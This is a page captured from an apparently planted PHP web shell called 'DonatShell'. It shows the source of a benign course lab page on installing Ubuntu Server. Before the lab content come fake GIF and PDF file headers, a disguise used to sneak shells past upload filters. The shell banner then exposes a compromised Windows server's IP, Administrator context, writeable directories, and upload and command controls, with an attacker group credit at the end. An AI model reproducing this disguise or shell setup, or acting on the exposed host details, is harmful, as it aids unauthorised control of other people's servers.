GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/MichaelMalz/CST2608/_Archive/Labs/Lab01/Notes/ServerInstall/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/MichaelMalz/CST2608/_Archive/Labs/Lab01/Notes/ServerInstall/index.php
<?
// Lab01/index.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
include('application.phpinc');
include('Course/courseInfo.phpinc');
include('../../classInfo.phpinc');

$assignmentNumber = 1;
$assignmentType = "Lab";
$assignmentTitle = "Ubuntu Server Install";
$evaluationType = "";
$evaluationTitle = $assignmentTitle;
if (strlen($assignmentNumber) == 1) { $assignmentName = $assignmentType."0".$assignmentNumber; $evaluationName = $evaluationType."0".$assignmentNumber; } else { 
$assignmentName = $assignmentType.$assignmentNumber; $evaluationName = $evaluationType.$assignmentNumber; }
if ($evaluationTitle != '') $evaluationTitle = ' - '.$evaluationTitle;

$title = $assignmentType." ".$assignmentNumber.": ".$assignmentTitle;
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br />'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
$smallTitle = true;
$js='openCenteredWindow';
include('common/pageHeader.phpinc');
$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title;
include('common/sectionHeader.phpinc');
?>
<fieldset class="pio"><legend>VMware setup</legend>

<ol>
<li>
Select installation language. Select <b>English</b> and hit enter.
<br />
<img src="Screen01_SelectInstallLanguage.png" alt="Select installation language">
</li>

<li>
Begin the installation. Hit enter.
<br />
<img src="Screen02_InstallUbuntuServer.png" alt="Begin the installation">
</li>

<li>
Select the Ubuntu server language. Select <b>English</b> and hit enter.
<br />
<img src="Screen03_SelectServerLanguage.png" alt="Select the Ubuntu server language">
</li>

<li>
Select the country. Select the <b>United States</b> and hit enter
<br />
<img src="Screen04_SelectCountry.png" alt="Select the country">
</li>

<li>
Select keyboard layout. I decided to not detect the keyboard so I tabbed to <b>No</b> and hit enter.
<br />
<img src="Screen05_DetectKeyboard.png" alt="Select keyboard layout">
</li>

<li>
Select the keyboard origin. I selected <b>USA</b> and hit enter.
<br />
<img src="Screen06_SelectKeyboard.png" alt="Select the keyboard origin">
</li>

<li>
Select the keyboard layout. Again I selected <b>USA</b> and hit enter.
<br />
<img src="Screen07_SelectKeyboard2.png" alt="Select the keyboard layout">
</li>

<li>
Enter the hostname. I entered <b>usjim</b> (I suggest restricting the hostname to 8 characters or less), tabbed to <b>Continue</b>, and hit enter.
<br />
<img src="Screen08_Hostname.png" alt="Enter the hostname">
</li>

<li>
Configure clock. I selected <b>Central</b> and hit enter.
<br />
<img src="Screen09_TimeZone.png" alt="Configure clock">
</li>

<li>
Partition disks. I selected <b>Guided - use entire disk</b> and hit enter.
<br />
<img src="Screen10_PartitionDisks.png" alt="Partition disks">
</li>

<li>
Partition disks. Hit enter.
<br />
<img src="Screen11_SelectDisk.png" alt="Partition disks">
</li>

<li>
Partition disks. Select <b>Yes</b> and hit enter.
<br />
<img src="Screen12_WriteChangesToDisk.png" alt="Partition disks">
</li>

<li>
Setup users and passwords - Full name. Enter your full name (I entered <b>Jim Martinson</b>), tab to <b>Continue</b>, and hit enter.
<br />
<img src="Screen13_CreateUserName.png" alt="Setup users and passwords - Full name">
</li>

<li>
Setup users and passwords - username. Enter the username (login name) (I entered <b>jim</b>), tab to <b>Continue</b>, and hit enter.
<br />
<img src="Screen14_CreateUserLogin.png" alt="Setup users and passwords - username">
</li>

<li>
Enter password. Enter the password for your username, tab to <b>Continue</b>, and hit enter.
<br />
<img src="Screen15_Password.png" alt="Enter password">
</li>

<li>
Confirm password. Enter the password for your username, tab to <b>Continue</b>, and hit enter.
<br />
<img src="Screen16_PasswordConfirm.png" alt="Confirm password">
</li>

<li>
Skip the proxy setup. Tab to <b>Continue</b>, and hit enter.
<br />
<img src="Screen17_Proxy.png" alt="Proxu setup">
</li>

<li>
Software selection. I selected everything except PostgreSQL database.
<br />
<img src="Screen18_SoftwareSelection.png" alt="Software selection">
</li>

<li>
Enter MySQL password. Enter the password for the MySQL root user, tab to <b>Continue</b>, and hit enter.
<br />
<img src="Screen19_MySQLroot.png" alt="Enter MySQL password">
</li>

<li>
Confirm MySQL password. Enter the password for the MySQL root user, tab to <b>Continue</b>, and hit enter.
<br />
<img src="Screen20_MySQLrootConfirm.png" alt="Confirm MySQL password">
</li>

<li>
I did not configure the email server at this time.
<br />
<img src="Screen21_MailServerConfig.png" alt="Configure email server">
</li>

<li>
The installation is now complete. Hit enter to boot up the server.
<br />
<img src="Screen22_InstallationComplete.png" alt="The installation is now complete">
</li>

<li>
This is what my first boot looked like.
<br />
<img src="Screen23_FirstBoot.png" alt="23">
</li>

<li>
And my first login.
<br />
<img src="Screen24_FirstLogin.png" alt="24">
</li>

<li>
Here I entered the <b>uname -a</b> and <b>cat /etc/lsb-release</b> commands for my screen shot.
<br />
<img src="Screen25_LabProof.png" alt="25">
</li>

</ol>

<a name="FromDesktop"></a>
<p>
If you have already installed the desktop software you can:
<ol>

<li>
Open a Terminal window.
<br />
<img src="Desktop01_TerminalWindow.png" alt="Open a Terminal window">
</li>

<li>
Enter the commands: <b>uname -a</b> and <b>cat /etc/lsb-release</b> for your screen shot.
<br />
<img src="Desktop02_LabProof.png" alt="d2">
</li>

</ol>
</p>

</fieldset>

<?
include('Course/ExampleFlles.phpinc');
include('../../ReferencesResources.phpinc');
include('common/sectionFooter.phpinc');
include('common/pageFooter.phpinc');

?>

Anon7 - 2022
AnonSec Team